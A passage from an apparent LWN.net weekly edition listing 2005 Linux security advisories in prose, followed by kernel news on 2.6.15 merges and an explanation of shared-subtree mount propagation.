Description: Stefan Esser discovered that by calling certain PHP files directly, it was possible to workaround the grab_globals.lib.php security model and overwrite the $cfg configuration array. Systems running PHP in safe mode are not affected. Futhermore, Tobias Klein reported several cross-site-scripting issues resulting from insufficient user input sanitizing. A local attacker may exploit this vulnerability by sending malicious requests, causing the execution of arbitrary code with the rights of the user running the web server. Furthermore, the cross-site scripting issues give a remote attacker the ability to inject and execute malicious script code or to steal cookie-based authentication credentials, potentially compromising the victim's browser.
Alerts:
SuSE SUSE-SA:2005:066 2005-11-18
Slackware SSA:2005-310-05 2005-11-07
Debian DSA-880-1 2005-11-02
Gentoo 200510-21 2005-10-25

Comments (none posted)

phpsysinfo: cross-site-scripting

Package(s):phpsysinfo CVE #(s):CAN-2005-0870
Created:May 18, 2005 Updated:November 15, 2005
Description: The phpsysinfo program contains several cross-site scripting vulnerabilities.
Alerts:
Debian DSA-724-1 2005-05-18

Comments (none posted)

postgresql: database initialization errors

Package(s):postgresql CVE #(s):CAN-2005-1409 CAN-2005-1410
Created:May 4, 2005 Updated:February 28, 2006
Description: PostgreSQL suffers from two vulnerabilities in how databases are set up by default; they allow a local attacker (one with access to the database) to crash the back end and, perhaps, execute code with the privileges of the server process. See this advisory for details and workarounds.
Alerts:
Fedora-Legacy FLSA:157366 2006-02-27
Mandriva MDKSA-2005:093 2005-05-26
Red Hat RHSA-2005:433-01 2005-06-01
Gentoo 200505-12 2005-05-15
Fedora FEDORA-2005-368 2005-05-10
Ubuntu USN-118-1 2005-05-04

Comments (none posted)

Pound: buffer overflow

Package(s):pound CVE #(s):CVE-2005-1391
Created:May 2, 2005 Updated:January 10, 2006
Description: Steven Van Acker has discovered a buffer overflow vulnerability in the "add_port()" function in Pound 1.8.2+. A remote attacker could send a request for an overly long hostname parameter, which could lead to the remote execution of arbitrary code with the rights of the Pound daemon process.
Alerts:
Gentoo 200504-29 2005-04-30

Comments (none posted)

pstotext: remote execution of arbitrary code

Package(s):pstotext netpbm CVE #(s):CAN-2005-2471
Created:August 1, 2005 Updated:March 28, 2006
Description: Max Vozeler reported that pstotext calls the GhostScript interpreter on untrusted PostScript files without specifying the -dSAFER option. An attacker could craft a malicious PostScript file and entice a user to run pstotext on it, resulting in the execution of arbitrary commands with the permissions of the user running pstotext. See this Secunia advisory for more information.
Alerts:
Debian DSA-1021-1 2006-03-28
Debian DSA-792-1 2005-08-31
Red Hat RHSA-2005:743-01 2005-08-22
Fedora FEDORA-2005-728 2005-08-17
Fedora FEDORA-2005-727 2005-08-17
Ubuntu USN-164-1 2005-08-11
Mandriva MDKSA-2005:133 2005-08-09
Gentoo 200508-04 2005-08-05
Gentoo 200507-29 2005-07-31

Comments (2 posted)

Py2Play: remote execution of arbitrary Python code

Package(s):Py2Play CVE #(s):CAN-2005-2875
Created:September 19, 2005 Updated:September 6, 2006
Description: Py2Play uses Python pickles to send objects over a peer-to-peer game network, that clients accept without restriction the objects and code sent by peers. A remote attacker participating in a Py2Play-powered game can send malicious Python pickles, resulting in the execution of arbitrary Python code on the targeted game client.
Alerts:
Gentoo 200509-09:02 2005-09-17
Debian DSA-856-1 2005-10-10
Gentoo 200509-09 2005-09-17

Comments (none posted)

rp-pppoe, pppoe: missing privilege dropping

Package(s):rp-pppoe, pppoe CVE #(s):CAN-2004-0564
Created:October 4, 2004 Updated:November 15, 2005
Description: Max Vozeler discovered a vulnerability in pppoe, the PPP over Ethernet driver from Roaring Penguin. When the program is running setuid root (which is not the case in a default Debian installation), an attacker could overwrite any file on the file system.
Alerts:
Fedora-Legacy FLSA:152794 2005-11-14
Mandrake MDKSA-2004:145 2004-12-06
Debian DSA-557-1 2004-10-04

Comments (none posted)

smb4k: temporary file vulnerability

Package(s):smb4k CVE #(s):CVE-2005-2851
Created:September 7, 2005 Updated:December 7, 2005
Description: Smb4K has a temporary file vulnerability which can allow an unprivileged user to read certain files which would otherwise be inaccessible.
Alerts:
Debian-Testing DTSA-25-1 2005-12-05
Gentoo 200511-15 2005-11-18
Mandriva MDKSA-2005:157 2005-09-06

Comments (none posted)

squid: DoS issues

Package(s):squid CVE #(s):CAN-2005-2794 CAN-2005-2796
Created:September 6, 2005 Updated:November 7, 2005
Description: Squid-2.5.10-r2 and earlier has three Denial of Service issues.
Alerts:
Debian DSA-809-3 2005-11-07
Debian DSA-809-2 2005-09-30
SuSE SUSE-SA:2005:053 2005-09-16
Red Hat RHSA-2005:766-01 2005-09-15
Ubuntu USN-183-1 2005-09-13
Mandriva MDKSA-2005:162 2005-09-12
Debian DSA-809-1 2005-09-13
OpenPKG OpenPKG-SA-2005.021 2005-09-10
Gentoo 200509-06 2005-09-07
Fedora FEDORA-2005-852 2005-09-06
Fedora FEDORA-2005-851 2005-09-06

Comments (none posted)

squid: authentication handling

Package(s):squid CVE #(s):CAN-2005-2917
Created:September 30, 2005 Updated:March 15, 2006
Description: Upstream developers of squid, the popular WWW proxy cache, have discovered that changes in the authentication scheme are not handled properly when given certain request sequences while NTLM authentication is in place, which may cause the daemon to restart.
Alerts:
Red Hat RHSA-2006:0045-01 2006-03-15
Red Hat RHSA-2006:0052-01 2006-03-07
Fedora-Legacy FLSA:152809 2006-02-18
Mandriva MDKSA-2005:181 2005-10-11
Ubuntu USN-192-1 2005-09-30
Debian DSA-828-1 2005-09-30

Comments (none posted)

Squirrelmail: preference modification

Package(s):squirrelmail CVE #(s):CAN-2005-2095
Created:November 2, 2005 Updated:November 2, 2005
Description: Versions of Squirrelmail prior to 1.4.5 have an error in how the $_POST variable is handled. As a result, a user's preferences can be viewed and modified.
Alerts:
Mandriva MDKSA-2005:202 2005-11-01

Comments (1 posted)

sudo: missing input sanitizing

Package(s):sudo CVE #(s):CVE-2005-2959
Created:October 25, 2005 Updated:February 19, 2006
Description: Tavis Ormandy noticed that sudo, a program that provides limited super user privileges to specific users, does not clean the environment sufficiently. The SHELLOPTS and PS4 variables are dangerous and are still passed through to the program running as privileged user. This can result in the execution of arbitrary commands as privileged user when a bash script is executed. These vulnerabilities can only be exploited by users who have been granted limited super user privileges.
Alerts:
OpenPKG OpenPKG-SA-2006.002 2006-02-18
Trustix TSLSA-2005-0062 2005-11-04
Ubuntu USN-213-1 2005-10-28
Mandriva MDKSA-2005:201 2005-10-27
Debian DSA-870-1 2005-10-25

Comments (none posted)

sudo: race condition

Package(s):sudo CVE #(s):CAN-2005-1993
Created:June 21, 2005 Updated:February 24, 2006
Description: Charles Morris discovered a race condition in sudo which could lead to privilege escalation. If /etc/sudoers allowed a user the execution of selected programs, and this was followed by another line containing the pseudo-command "ALL", that user could execute arbitrary commands with sudo by creating symbolic links at a certain time.
Alerts:
Fedora-Legacy FLSA:162750 2006-02-23
Debian DSA-735-2 2005-07-07
Debian DSA 735-1 2005-07-01
Red Hat RHSA-2005:535-04 2005-06-29
SuSE SUSE-SA:2005:036 2005-06-24
OpenPKG OpenPKG-SA-2005.012 2005-06-23
Gentoo 200506-22 2005-06-23
Slackware SSA:2005-172-01 2005-06-22
Mandriva MDKSA-2005:103 2005-06-21
Fedora FEDORA-2005-473 2005-06-21
Fedora FEDORA-2005-472 2005-06-21
Ubuntu USN-142-1 2005-06-21

Comments (none posted)

sysreport: insecure temporary file

Package(s):sysreport CVE #(s):CAN-2005-2104
Created:August 9, 2005 Updated:November 11, 2005
Description: Bill Stearns discovered a bug in the way sysreport creates temporary files. It is possible that a local attacker could obtain sensitive information about the system when sysreport is run.
Alerts:
Fedora FEDORA-2005-1072 2005-11-10
Fedora FEDORA-2005-1071 2005-11-10
Red Hat RHSA-2005:598-01 2005-08-09

Comments (none posted)

File overwrite vulnerability in tar and unzip

Package(s):tar unzip CVE #(s):CAN-2001-1267 CAN-2001-1268 CAN-2001-1269 CAN-2002-0399
Created:October 1, 2002 Updated:April 10, 2006
Description: The tar utility does not properly filter file names containing "../", meaning that a hostile archive can, if unpacked by an unsuspecting user, overwrite any file that is writable by that user. GNU tar versions 1.13.19 and earlier are vulnerable; unzip through version 5.42 has the same vulnerability.
Alerts:
Fedora-Legacy FLSA:183571-1 2006-04-04
Red Hat RHSA-2006:0195-01 2006-02-21
Conectiva CLA-2002:538 2002-10-29
Mandrake MDKSA-2002:066 2002-10-10
Mandrake MDKSA-2002:065 2002-10-10
EnGarde ESA-20021003-022 2002-10-03
Gentoo unzip-20021001 2002-10-01
Gentoo tar-20021001 2002-10-01
Red Hat RHSA-2002:096-24 2002-09-18

Comments (1 posted)

tcpdump: multiple DoS issues

Package(s):tcpdump CVE #(s):CAN-2005-1280 CAN-2005-1279 CAN-2005-1278
Created:May 2, 2005 Updated:April 10, 2006
Description: The rsvp_print function in tcpdump 3.9.1 and earlier allows remote attackers to cause a denial of service (infinite loop) via a crafted RSVP packet of length 4. (CAN-2005-1280)

tcpdump 3.8.3 and earlier allows remote attackers to cause a denial of service (infinite loop) via a crafted BGP packet, which is not properly handled by RT_ROUTING_INFO, or LDP packet, which is not properly handled by the ldp_print function. (CAN-2005-1279)

The isis_print function, as called by isoclns_print, in tcpdump 3.9.1 and earlier allows remote attackers to cause a denial of service (infinite loop) via a zero length, as demonstrated using a GRE packet. (CAN-2005-1278)

Alerts:
Fedora-Legacy FLSA:156139 2006-04-04
Debian DSA-850-1 2005-10-09
Mandriva MDKSA-2005:087 2005-05-11
Red Hat RHSA-2005:417-02 2005-05-11
Red Hat RHSA-2005:421-02 2005-05-11
Gentoo 200505-06 2005-05-09
Ubuntu USN-119-1 2005-05-06
Fedora FEDORA-2005-351 2005-05-02

Comments (none posted)

texinfo: temporary file vulnerability

Package(s):texinfo CVE #(s):CAN-2005-3011
Created:October 5, 2005 Updated:November 9, 2006
Description: Texinfo prior to version 4.8-r1 suffers from a temporary file vulnerability.
Alerts:
Ubuntu USN-194-2 2006-01-09
Fedora FEDORA-2005-991 2005-10-14
Fedora FEDORA-2005-990 2005-10-14
Mandriva MDKSA-2005:175 2005-10-06
Ubuntu USN-194-1 2005-10-06
Gentoo 200510-04 2005-10-05

Comments (none posted)

TikiWiki: XSS vulnerability

Package(s):tikiwiki CVE #(s):
Created:October 28, 2005 Updated:November 2, 2005
Description: Due to improper input validation, TikiWiki can be exploited to perform cross-site scripting attacks. A remote attacker could exploit this to inject and execute malicious script code or to steal cookie-based authentication credentials, potentially compromising the victim's browser.
Alerts:
Gentoo 200510-23 2005-10-28

Comments (none posted)

ucd-snmp: denial of service

Package(s):ucd-snmp CVE #(s):CAN-2005-2177
Created:August 9, 2005 Updated:January 27, 2006
Description: A denial of service bug was found in the way ucd-snmp uses network stream protocols. A remote attacker could send a ucd-snmp agent a specially crafted packet which will cause the agent to crash.
Alerts:
Mandriva MDKSA-2006:025 2006-01-26
Ubuntu USN-190-2 2005-11-21
Debian DSA-873-1 2005-10-26
Red Hat RHSA-2005:395-01 2005-10-05
Ubuntu USN-190-1 2005-09-29
Red Hat RHSA-2005:373-01 2005-09-28
Mandriva MDKSA-2005:137 2005-08-11
Red Hat RHSA-2005:720-01 2005-08-09

Comments (none posted)

uim: privilege escalation

Package(s):uim CVE #(s):CVE-2005-3149
Created:October 4, 2005 Updated:December 7, 2005
Description: Masanari Yamamoto discovered that Uim uses environment variables incorrectly. This bug causes a privilege escalation if setuid/setgid applications are linked to libuim. This bug only affects immodule-enabled Qt (if you build Qt 3.3.2 or later versions with USE="immqt" or USE="immqt-bc").
Alerts:
Debian-Testing DTSA-22-1 2005-12-05
Debian DSA-895-1 2005-11-14
Mandriva MDKSA-2005:198 2005-10-26
Gentoo 200510-03 2005-10-04

Comments (none posted)

unzip: race condition

Package(s):unzip CVE #(s):CAN-2005-2475
Created:September 29, 2005 Updated:January 12, 2006
Description: Unzip has a race condition vulnerability in the handling of output files. During file unpacking, a local attacker can modify the permissions of arbitrary files in the victim's directory.
Alerts:
Debian DSA-903-2 2006-01-12
Debian DSA-903-1 2005-11-21
Mandriva MDKSA-2005:197 2005-10-26
Trustix TSLSA-2005-0053 2005-09-30
Ubuntu USN-191-1 2005-09-29

Comments (none posted)

up-imapproxy: format string vulnerabilities

Package(s):up-imapproxy CVE #(s):CAN-2005-2661
Created:October 10, 2005 Updated:March 7, 2006
Description: up-imapproxy contains two format string vulnerabilities which could be exploited to execute arbitrary code.
Alerts:
Gentoo 200603-04 2006-03-06
Debian DSA-852-1 2005-10-09

Comments (none posted)

util-linux: unintentional grant of privileges by umount

Package(s):util-linux CVE #(s):CAN-2005-2876
Created:September 13, 2005 Updated:December 19, 2005
Description: Linux umount command as provided in the util-linux package in versions 2.8 to 2.12q, 2.13-pre1 and 2.13-pre2 grants root privileges. See this BugTraq post for more information.
Alerts:
Fedora-Legacy FLSA:168326 2005-12-18
Red Hat RHSA-2005:782-01 2005-10-11
SuSE SUSE-SR:2005:021 2005-09-30
Debian DSA-825-1 2005-09-29
Debian DSA-823-1 2005-09-29
Mandriva MDKSA-2005:167 2005-09-20
Gentoo 200509-15 2005-09-20
Ubuntu USN-184-1 2005-09-19
Fedora FEDORA-2005-886 2005-09-14
Fedora FEDORA-2005-887 2005-09-14
Slackware SSA:2005-255-02 2005-09-13

Comments (none posted)

uw-imap: buffer overflow

Package(s):uw-imap CVE #(s):CAN-2005-2933
Created:October 11, 2005 Updated:April 10, 2006
Description: "infamous41md" discovered a buffer overflow in uw-imap, the University of Washington's IMAP Server that allows attackers to execute arbitrary code.
Alerts:
Fedora-Legacy FLSA:184098 2006-04-04
Fedora-Legacy FLSA:170411 2006-04-04
Fedora FEDORA-2005-1112 2005-12-08
Fedora FEDORA-2005-1115 2005-12-08
Red Hat RHSA-2005:850-01 2005-12-06
Red Hat RHSA-2005:848-01 2005-12-06
Mandriva MDKSA-2005:194 2005-10-26
Trustix TSLSA-2005-0055 2005-10-07
Mandriva MDKSA-2005:189 2005-10-20
SuSE SUSE-SR:2005:023 2005-10-14
Gentoo 200510-10 2005-10-11
Debian DSA-861-1 2005-10-11

Comments (none posted)

vixie-cron: crontab allows any user to read another users crontabs

Package(s):vixie-cron CVE #(s):CAN-2005-1038
Created:April 15, 2005 Updated:March 15, 2006
Description: crontab in Vixie cron 4.1, when running with the -e option, allows local users to read the cron files of other users by changing the file being edited to a symlink. NOTE: there is insufficient information to know whether this is a duplicate of CVE-2001-0235. See also this Security Focus report.
Alerts:
Red Hat RHSA-2006:0117-01 2006-03-15
Red Hat RHSA-2005:361-01 2005-10-05
Fedora FEDORA-2005-320 2005-04-15

Comments (none posted)

w3c-libwww: possible stack overflow

Package(s):w3c-libwww CVE #(s):CVE-2005-3183
Created:October 14, 2005 Updated:May 2, 2007
Description: xtensive testing of libwww's handling of multipart/byteranges content from HTTP/1.1 servers revealed multiple logical flaws and bugs in Library/src/HTBound.c
Alerts:
Red Hat RHSA-2007:0208-02 2007-05-01
Ubuntu USN-220-1 2005-12-01
Mandriva MDKSA-2005:210 2005-11-09
Fedora FEDORA-2005-953 2005-10-07
Fedora FEDORA-2005-952 2005-10-07

Comments (1 posted)

XChat 2.0.x SOCKS5 Vulnerability

Package(s):xchat CVE #(s):CAN-2004-0409
Created:April 19, 2004 Updated:November 15, 2005
Description: XChat is vulnerable to a stack overflow that may allow a remote attacker to run arbitrary code. The SOCKS 5 proxy code in XChat is vulnerable to a remote exploit. Users would have to be using XChat through a SOCKS 5 server, enable SOCKS 5 traversal which is disabled by default and also connect to an attacker's custom proxy server. This vulnerability may allow an attacker to run arbitrary code within the context of the user ID of the XChat client.
Alerts:
Fedora-Legacy FLSA:123013 2005-11-14
Red Hat RHSA-2004:585-01 2004-10-27
Netwosix NW-2004-0014 2004-05-01
Red Hat RHSA-2004:177-01 2004-04-30
Mandrake MDKSA-2004:036 2004-04-21
Debian DSA-493-1 2004-04-21
Gentoo 200404-15 2004-04-19

Comments (none posted)

xine-lib: buffer overflows

Package(s):xine-lib CVE #(s):CAN-2004-1379
Created:September 22, 2004 Updated:April 10, 2006
Description: xine-lib (through version 1_rc6) contains buffer overflows in the subtitle parsing and DVD sub-picture decoder code.
Alerts:
Fedora-Legacy FLSA:152873 2006-04-04
Debian DSA-657-1 2005-01-25
Mandrake MDKSA-2004:105 2004-10-06
Slackware SSA:2004-266-04 2004-09-22
Gentoo 200409-30 2004-09-22

Comments (none posted)

xine-ui - insecure temporary file creation

Package(s):xine-ui CVE #(s):CAN-2004-0372
Created:April 6, 2004 Updated:April 27, 2006
Description: Shaun Colley discovered a problem in xine-ui, the xine video player user interface. A script contained in the package to possibly remedy a problem or report a bug does not create temporary files in a secure fashion. This could allow a local attacker to overwrite files with the privileges of the user invoking xine.
Alerts:
Gentoo 200404-20 2004-04-27
Slackware SSA:2004-111-01 2004-04-20
Mandrake MDKSA-2004:033 2004-04-19
Debian DSA-477-1 2004-04-06

Comments (none posted)

xloadimage: buffer overflows

Package(s):xloadimage CVE #(s):CAN-2005-3178
Created:October 10, 2005 Updated:May 15, 2006
Description: Three buffer overflows were discovered in xloadimage when handling the image title name. A malicious user can construct a NIFF file that when viewed and processed (with either zoom, reduce or rotate) by xloadimage, will cause the program to overwrite the return address and execute arbitrary code.
Alerts:
Fedora-Legacy FLSA:152923 2006-05-12
Gentoo 200510-26 2005-10-30
Mandriva MDKSA-2005:192 2005-10-20
Red Hat RHSA-2005:802-01 2005-10-18
Debian DSA-859-1 2005-10-10
Debian DSA-858-1 2005-10-10
Fedora FEDORA-2005-981 2005-10-10

Comments (none posted)

xorg-x11: heap overflow

Package(s):xorg-x11 CVE #(s):CAN-2005-2495
Created:September 12, 2005 Updated:March 8, 2006
Description: The pixmap memory allocation code in the X.Org X window system is vulnerable to an integer overflow, a local user can use this to execute arbitrary code with elevated privileges.
Alerts:
Fedora-Legacy FLSA:168264-2 2006-03-07
Slackware SSA:2005-269-02 2005-09-26
SuSE SUSE-SA:2005:056 2005-09-26
Debian DSA-816-1 2005-09-19
Fedora FEDORA-2005-894 2005-09-16
Fedora FEDORA-2005-893 2005-09-16
Trustix TSLSA-2005-0049 2005-09-16
Red Hat RHSA-2005:501-01 2005-09-15
Mandriva MDKSA-2005:164 2005-09-13
Red Hat RHSA-2005:396-01 2005-09-13
Red Hat RHSA-2005:329-01 2005-09-12
Ubuntu USN-182-1 2005-09-12
Gentoo 200509-07 2005-09-12

Comments (none posted)

xpdf: buffer overflow

Package(s):xpdf CVE #(s):CAN-2005-0064
Created:January 19, 2005 Updated:March 15, 2007
Description: iDEFENSE has found yet another xpdf buffer overflow; see this advisory for details.
Alerts:
Fedora FEDORA-2007-1219 2007-03-14
Gentoo 200506-06 2005-06-09
Red Hat RHSA-2005:026-01 2005-03-16
Red Hat RHSA-2005:066-01 2005-02-15
Red Hat RHSA-2005:057-01 2005-02-15
Red Hat RHSA-2005:053-01 2005-02-15
Red Hat RHSA-2005:034-01 2005-02-15
Fedora-Legacy FLSA:2353 2005-02-10
Fedora-Legacy FLSA:2352 2005-02-10
Gentoo 200502-10 2005-02-09
Red Hat RHSA-2005:049-01 2005-02-01
SuSE SUSE-SR:2005:002 2005-01-26
Red Hat RHSA-2005:059-01 2005-01-26
Mandrake MDKSA-2005:020 2005-01-25
Mandrake MDKSA-2005:019 2005-01-25
Mandrake MDKSA-2005:016 2005-01-25
Mandrake MDKSA-2005:021 2005-01-25
Mandrake MDKSA-2005:018 2005-01-25
Mandrake MDKSA-2005:017 2005-01-25
Fedora FEDORA-2005-061 2005-01-25
Fedora FEDORA-2005-062 2005-01-25
Fedora FEDORA-2005-059 2005-01-25
Fedora FEDORA-2005-060 2005-01-25
Conectiva CLA-2005:921 2005-01-25
Fedora FEDORA-2004-049 2005-01-24
Fedora FEDORA-2004-048 2005-01-24
Gentoo 200501-32 2005-01-23
Gentoo 200501-31 2005-01-23
Gentoo 200501-30 2005-01-22
Gentoo 200501-28 2005-01-21
Fedora FEDORA-2005-052 2005-01-20
Fedora FEDORA-2005-051 2005-01-20
Ubuntu USN-64-1 2005-01-19
Debian DSA-645-1 2005-01-19
Debian DSA-648-1 2005-01-19

Comments (1 posted)

xpdf: denial of service

Package(s):xpdf kpdf CVE #(s):CAN-2005-2097
Created:August 9, 2005 Updated:August 2, 2006
Description: A flaw was discovered in Xpdf in that could allow an attacker to construct a carefully crafted PDF file that would cause Xpdf to consume all available disk space in /tmp when opened.
Alerts:
Debian DSA-1136-1 2006-08-02
Mandriva MDKSA-2005:138-1 2005-09-19
Debian DSA-780-1 2005-08-22
SuSE SUSE-SR:2005:019 2005-08-19
Fedora FEDORA-2005-732 2005-08-17
Fedora FEDORA-2005-733 2005-08-17
Gentoo 200508-08 2005-08-16
Fedora FEDORA-2005-730 2005-08-15
Fedora FEDORA-2005-729 2005-08-15
Mandriva MDKSA-2005:136 2005-08-11
Mandriva MDKSA-2005:135 2005-08-11
Mandriva MDKSA-2005:134 2005-08-11
Mandriva MDKSA-2005:138 2005-08-11
Red Hat RHSA-2005:708-01 2005-08-10
Red Hat RHSA-2005:706-01 2005-08-09
Red Hat RHSA-2005:671-01 2005-08-09
Red Hat RHSA-2005:670-01 2005-08-09
Ubuntu USN-163-1 2005-08-09

Comments (none posted)

zlib: buffer overflow

Package(s):zlib CVE #(s):CAN-2005-1849
Created:July 21, 2005 Updated:April 11, 2006
Description: zlib has a vulnerability that can cause code that executes it to crash if a corrupted file is opened.
Alerts:
Mandriva MDKSA-2006:070 2006-04-10
Debian DSA-1026-1 2006-04-06
Gentoo 200603-18 2006-03-21
Ubuntu USN-151-4 2005-11-09
Ubuntu USN-151-3 2005-10-28
Fedora-Legacy FLSA:162680 2005-09-14
Debian DSA-797-1 2005-09-01
Gentoo 200508-01 2005-08-01
Gentoo 200507-28 2005-07-30
SuSE SUSE-SA:2005:043 2005-07-28
OpenPKG OpenPKG-SA-2005.014 2005-07-28
Mandriva MDKSA-2005:124 2005-07-22
Slackware SSA:2005-203-03 2005-07-23
Ubuntu USN-151-2 2005-07-22
Fedora FEDORA-2005-626 2005-07-22
Fedora FEDORA-2005-625 2005-07-22
Gentoo 200507-19 2005-07-22
Red Hat RHSA-2005:584-01 2005-07-21
Ubuntu USN-151-1 2005-07-21
Debian DSA-763-1 2005-07-20

Comments (none posted)

Events

LayerOne 2006 CFP Released

LayerOne is a security conference held in the Los Angeles, California area. The call for papers is out now, with submissions due by March 31. Click below for the full announcement.

Full Story (comments: none)

Page editor: Jonathan Corbet

Kernel development

Brief items

Kernel release status

The current stable 2.6 kernel is 2.6.14.1, released on November 8. This kernel contains a single patch for a sysctl-related oops. There was some unhappiness that the patch for the "zero-length datagrams get dropped" bug, which breaks bind and tcpdump, was not included. That patch will turn up in 2.6.14.2, which should be released around November 12.

There is still no 2.6.15 prepatch as of this writing. The merge window for this cycle is about to close, however, so 2.6.15-rc1 may be out by the time you read this. An impressive pile of patches has been merged into the mainline git repository; see the article below for a list of significant additions since last week.

The current -mm tree is 2.6.14-mm1. Recent changes to -mm include 64Kb page support for the ppc64 architecture, the swap migration patches, and the lean-and-mean "slob" allocator. The -mm tree has slimmed down considerably as patches have been merged into the mainline.

The current 2.4 prepatch is 2.4.32-rc3, released by Marcelo on November 9. This release candidate adds exactly two patches for serious problems; the final 2.4.32 release will likely happen soon.

Comments (none posted)

Kernel development news

Quote of the week

When you hear voices in your head that tell you to shoot the pope, do you do what they say? Same thing goes for customers and managers. They are the crazy voices in your head, and you need to set them right, not just blindly do what they ask for.
-- Linus Torvalds

Comments (4 posted)

More goodies for 2.6.15

Last week's what's going into 2.6.15 article had a long list of changes merged into the mainline. The kernel developers weren't done, however. Here is a list of changes merged since that article was written:

  • A big XFS update (including barrier support).

  • A SCSI RDMA protocol initiator for InfiniBand.

  • The open-iSCSI patches.

  • The removal of the (broken) Compaq fibre channel driver.

  • RapidIO bus support.

  • The netlink connector patch, with the process events connector on top.

  • A number of packet scheduler improvements.

  • An ALSA update.

  • The un-exporting of a number of kernel symbols (clear_page_dirty_for_io, console_unblank, cpu_core_id hugetlb_total_pages, idle_cpu, nr_swap_pages, phys_proc_id, reprogram_timer, swapper_space, sysctl_overcommit_memory, sysctl_overcommit_ratio, sysctl_max_map_count, total_swap_pages, user_get_super, uts_sem, vm_acct_memory, and vm_committed_space,).

  • A big purge of code which checks pointers for NULL prior to passing them to kfree().

  • A big reorganization of the block subsystem code (it has its own top-level block directory now).

  • A memory technology devices update, including support for OneNAND, Sibley, and resident flash disk devices.

  • The shared subtrees patches.

  • An MPPE encryption module for PPP.

  • The removal of all Bluetooth-related files from /proc (they are in /sys/class/bluetooth now).

  • Some significant reworking and cleanup of the software suspend code.

  • Big changes to the DVB and Video4Linux subsystems, including support for a number of new devices.

  • A number of open sound system drivers are now explicitly scheduled for removal in January (probably 2.6.16, in other words).

  • Version 1 of the Video4Linux API has also been scheduled for removal (in July, 2006).

  • Support for rotation of the console screen (to support mobile devices which have a natural orientation which is not zero degrees).

  • A number of scheduler tweaks to improve efficiency and resource usage on larger systems.

  • Big updates to the ipw2100 and ipw2200 drivers.

There is also the usual big pile of fixes, and a number of architecture updates.

Comments (1 posted)

Shared subtrees

The shared subtrees patch set, written primarily by Ram Pai, has been in circulation for some time, but without a whole lot of discussion. Those patches have now been merged into the pre-2.6.15 mainline, so the time has come for a closer look. In short, shared subtrees allow a system administrator to configure, in great detail, how various filesystem mounts should appear in the tree, how they relate to each other, and how they propagate between namespaces. There are two motivations for this work:

  • The "files as directories" feature of the reiser4 filesystem allows a user to create, via hard links, a directory which appears in multiple places in the filesystem. That feature has long been disabled due to the deadlock issues which it raised. Shared subtrees are a step toward implementing "files as directories" in a safe manner.

  • The merging of the filesystems in user space patch, and some of the permissions issues associated with it, has increased the desire to be able to run users in their own filesystem namespaces. Per-user namespaces are currently awkward at best; shared subtrees will help make them easier to manage.

It should be noted that the patches merged into the mainline are not a complete solution for either of the above problems, but they are a step in that direction. The per-user namespaces example will be used in what follows to illustrate how the various subtree options work.

Every filesystem in Linux is mounted within a specific namespace. The kernel has long supported the creation of multiple namespaces, but, in most situations, that feature is not used. So the typical Linux system has a single namespace which is shared between all processes on the system. When separate namespaces are used, they are usually in the context of sandboxing and isolation. There would be advantages, however, to making more extensive use of namespaces.

[simple tree] Imagine, for starters, a simple filesystem hierarchy which looks something like the diagram at the right. Clearly, a few directories have been left out for simplicity. The only unusual thing is that a couple of directories have been created under /subtree for users "alice" and "bob". We would like to use those directories as the root for each user's own private view of the filesystem.

The first step is to create a copy of the root filesystem under each user's subtree directory using bind mounts. The result of such an operation will look like the diagram below.

[diagram]
Note that the /subtree tree has been bound into each user's namespace as well. This propagation cuts down on the isolation between users, since they can see each others' subtrees. As the number of users grows, it also complicates the namespaces considerably, as each set of subtrees must be replicated over and over.

This loss of isolation and explosion of mount points can be avoided through the use of "unbindable" mounts, a new feature added by the sharable subtrees patch. Said mounts cannot be bound into other places, and will not be propagated into new subtrees. So the administrator could execute a series of commands like:

    mount --bind /subtree /subtree
    mount --make-unbindable /subtree

This incantation turns /subtree into a magic point which cannot be rebound. If, after this has been done, the administrator makes the per-user bind mounts of the root filesystem, the portion under /subtree will be pruned, with a result which looks like this:

[diagram]

Now imagine that the system administrator mounts a CDROM under /mnt. The result will look like:

[diagram]

Note that the CDROM mount is not visible in the per-user namespaces, so bob and alice will be unable to look at the contents of the CD. That might be the intended result, but imagine it's not, that the administrator wants all users to be able to see things mounted on /mnt. The answer is a "sharable" mount, one which is automatically propagated into every place where the original mount appears. So, the administrator need only perform another new incantation:

    mount --bind /mnt /mnt
    mount --make-shared /mnt
After this, /mnt is a sharable mount. Any changes made there will appear in any namespace where /mnt appears. The resulting tree would look something like this:

[diagram]

Many administrators might rather just make the entire filesystem tree sharable, rather than try to anticipate where changes could be made. If the root is made sharable in this way, any new filesystems which are mounted will propagate throughout the tree. This propagation works all ways; if alice mounts the CD within her subtree, it will still appear in all of the subtrees.

Of course, this behavior might not always be desirable. If, for example, bob is using FUSE to mount an "ssh filesystem" from a remote host, he would prefer that this filesystem not be visible to other users at all. But bob would still like to see filesystems mounted elsewhere, and does not want to give up the advantages of a shared subtree. The answer is yet another type of mount, called a "slave" mount. Slave mounts are selfish: they remain tied to their parent mount, and receive new mounts from there. Anything mounted underneath the slave mount, however, will not be propagated elsewhere. So each user can have his or her own filesystems which are not part of the global hierarchy:

[diagram]

The shared subtrees patch also adds a "private" mount type, which is essentially how mounts in 2.6.14 and prior kernels work. A private mount will not be propagated to any other mounts, but it can (unlike an unbindable mount) be explicitly propagated via a bind operation.

Internally, the patches create the concept of a "peer group," among which mount events are propagated. A new mnt_share field (a list of peers) has been added to the vfsmount structure for this purpose. A couple of other lists (mnt_slave_list and mnt_slave) have been added for keeping track of slave mount relationships. A new MNT_UNBINDABLE flag marks unbindable mounts. And, of course, a great deal of locking work has been done to make all of this work in a safe manner. Al Viro has worked with a few iterations of the shared subtrees patch, with the result that it is now considered to be ready for the mainline.

The shared subtrees patch is a big step forward: it is a fundamental change to the virtual filesystem layer which greatly increases the flexibility in how namespaces can be populated and presented to users. What remains, at this point, is some work on the namespace side of things. Namespaces are still unnamed objects which can only be inherited from a parent process; there is no easy way to create and attach to a per-user namespace. Finishing the job will take some work, but, chances are, the hardest part of the problem has been solved.

For more information, see the extensive documentation file shipped with the patch.

Comments (18 posted)

A seq_file API tweak

The seq_file mechanism is a helper for kernel subsystems wanting to create lengthy virtual files, usually in /proc. 2.6.15 will include a small enhancement which may prove helpful for some users.

When user space opens a virtual file, the kernel must, in turn, call seq_open() to set things up. On return, the file structure passed to seq_open() will have, in its private_data field, a pointer to the seq_file structure created at open time. That is the same structure which will be passed to the seq_file iterator functions, and which must be used when actually generating output.

